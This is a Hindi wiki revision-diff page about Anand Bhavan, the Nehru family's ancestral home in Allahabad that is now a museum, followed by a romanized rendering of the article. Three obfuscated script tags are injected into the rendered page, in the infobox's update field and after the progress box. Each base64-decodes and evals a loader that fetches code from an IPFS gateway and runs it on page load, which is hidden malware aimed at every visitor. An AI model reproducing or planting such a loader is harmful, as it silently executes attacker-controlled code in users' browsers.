Difference between revisions of "आनंद भवन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[चित्र:Anandha-Bhawan-Allahabad.jpg|thumb|250px|आनंद भवन, [[इलाहाबाद]] <br /> Anandha Bhawan, Allahabad]]
+
{{सूचना बक्सा संग्रहालय
*आनंद भवन [[उत्तर प्रदेश]] के [[इलाहाबाद]] शहर मे स्थित है।  
+
|चित्र=Anandha-Bhawan-Allahabad.jpg
*आनंद भवन और उसके बराबर में स्थित [[स्वराज भवन इलाहाबाद|स्वराज भवन]] आज ऐतिहासिक धरोहर के रूप में विख्यात है।
+
|चित्र का नाम=आनंद भवन, इलाहाबाद
*एक जमाने में आनंद भवन भारतीय राजनीति में अहम स्थान रखने वाले नेहरू परिवार का निवास स्थान था।
+
|विवरण=आनंद भवन नेहरू परिवार का पुश्तैनी घर रहा है। अब इसे संग्रहालय का रूप दे दिया गया है।
*इस ऐतिहासिक इमारत को [[मोतीलाल नेहरू]] ने बनवाया था। [[1930]] में उन्होंने इसे राष्ट्र को समर्पित कर दिया था और एक नया भवन बनवाया और इसका नाम भी ‘आनंद भवन’ रखा।
+
|राज्य= [[उत्तर प्रदेश]]
*अब इसे संग्रहालय का रूप दे दिया गया है। यहाँ पर गाँधी-नेहरू परिवार की पुरानी निशानियों को देखा जा सकता है।
+
|नगर=[[इलाहाबाद]]  
*यह [[नेहरू-गाँधी परिवार वृक्ष|नेहरू परिवार]] का पुस्तेनी घर है जहाँ अब एक संग्रहालय है जिसमें नहेरू परिवार से जुड़ी यादों से सम्बन्धित चीजें प्रदर्शित हैं।  
+
|निर्माण=
*स्वंत्रता संग्राम से सम्बन्धित अनेक महत्त्वपूर्ण धटनओं से इस भवन का गहरा सम्बन्ध रहा है।
+
|स्थापना=[[मोतीलाल नेहरू]] द्वारा 19वीं शताब्दी में स्थापित किया गया था।
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=इलाहाबाद रेलवे स्टेशन से लगभग 4 किमी की दूरी पर है।
 +
|प्रसिद्धि=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Allahabad+Railway+Station,+Allahabad,+Uttar+Pradesh&daddr=Anand+Bhavan&hl=en&ll=25.44467,81.851921&spn=0.045806,0.090895&sll=26.936418,81.196561&sspn=0.022611,0.045447&geocode=FXRGhAEdPpzgBCmxVZZJ18qaOTEZN2NupFb92A%3BFfB6hAEdSBXhBCE6d8VYRQDi_Q&oq=Allahabad+&mra=ls&t=m&z=14 गूगल मानचित्र]
 +
|संबंधित लेख=[[स्वराज भवन इलाहाबाद|स्वराज भवन]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=यहाँ पर [[नेहरू-गाँधी परिवार वृक्ष|गाँधी-नेहरू परिवार]] की पुरानी निशानियों को देखा जा सकता है।  
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन= {{अद्यतन|13:18, 8 मई 2012 (IST)}}
 +
}}
 +
'''आनंद भवन''' और उसके बराबर में स्थित [[स्वराज भवन इलाहाबाद|स्वराज भवन]] [[उत्तर प्रदेश]] राज्य के [[इलाहाबाद]] शहर में स्थित ऐतिहासिक धरोहर के रूप में विख्यात है। एक समय पर आनंद भवन भारतीय राजनीति में अहम स्थान रखने वाले नेहरू परिवार का निवास स्थान था।
 +
*इस ऐतिहासिक इमारत को [[मोतीलाल नेहरू]] ने बनवाया था। [[1930]] में उन्होंने इसे राष्ट्र को समर्पित कर दिया था और एक नया भवन बनवाया और इसका नाम भी ‘आनंद भवन’ रखा। अब इसे संग्रहालय का रूप दे दिया गया है।  
 +
*यहाँ पर [[नेहरू-गाँधी परिवार वृक्ष|गाँधी-नेहरू परिवार]] की पुरानी निशानियों को देखा जा सकता है।
 +
*यह [[नेहरू-गाँधी परिवार वृक्ष|नेहरू परिवार]] का पुस्तेनी घर है जहाँ अब एक संग्रहालय है जिसमें नहेरू परिवार से जुड़ी यादों से सम्बन्धित वस्तुएँ प्रदर्शित हैं।  
 +
*स्वंत्रता संग्राम से सम्बन्धित अनेक महत्त्वपूर्ण घटनाओं से इस भवन का गहरा सम्बन्ध रहा है।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 16: Line 33:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तर प्रदेश के पर्यटन स्थल}}
+
{{संग्रहालय}}{{उत्तर प्रदेश के पर्यटन स्थल}}
[[Category:नया पन्ना]]
+
 
 +
[[Category:संग्रहालय]]
 
[[Category:उत्तर_प्रदेश]]
 
[[Category:उत्तर_प्रदेश]]
 
[[Category:उत्तर प्रदेश के पर्यटन स्थल]]
 
[[Category:उत्तर प्रदेश के पर्यटन स्थल]]
 
[[Category:इलाहाबाद]]
 
[[Category:इलाहाबाद]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 +
[[Category:संग्रहालय कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:47, 8 May 2012

anand bhavan
vivaran anand bhavan neharoo parivar ka pushtaini ghar raha hai. ab ise sangrahalay ka roop de diya gaya hai.
rajy uttar pradesh
nagar ilahabad
sthapana motilal neharoo dvara 19vian shatabdi mean sthapit kiya gaya tha.
marg sthiti ilahabad relave steshan se lagabhag 4 kimi ki doori par hai.
chitr:Map-icon.gif googal manachitr
sanbandhit lekh svaraj bhavan
any janakari yahaan par gaandhi-neharoo parivar ki purani nishaniyoan ko dekha ja sakata hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

anand bhavan aur usake barabar mean sthit svaraj bhavan uttar pradesh rajy ke ilahabad shahar mean sthit aitihasik dharohar ke roop mean vikhyat hai. ek samay par anand bhavan bharatiy rajaniti mean aham sthan rakhane vale neharoo parivar ka nivas sthan tha.

  • is aitihasik imarat ko motilal neharoo ne banavaya tha. 1930 mean unhoanne ise rashtr ko samarpit kar diya tha aur ek naya bhavan banavaya aur isaka nam bhi ‘anand bhavan’ rakha. ab ise sangrahalay ka roop de diya gaya hai.
  • yahaan par gaandhi-neharoo parivar ki purani nishaniyoan ko dekha ja sakata hai.
  • yah neharoo parivar ka pusteni ghar hai jahaan ab ek sangrahalay hai jisamean naheroo parivar se ju di yadoan se sambandhit vastuean pradarshit haian.
  • svantrata sangram se sambandhit anek mahattvapoorn ghatanaoan se is bhavan ka gahara sambandh raha hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh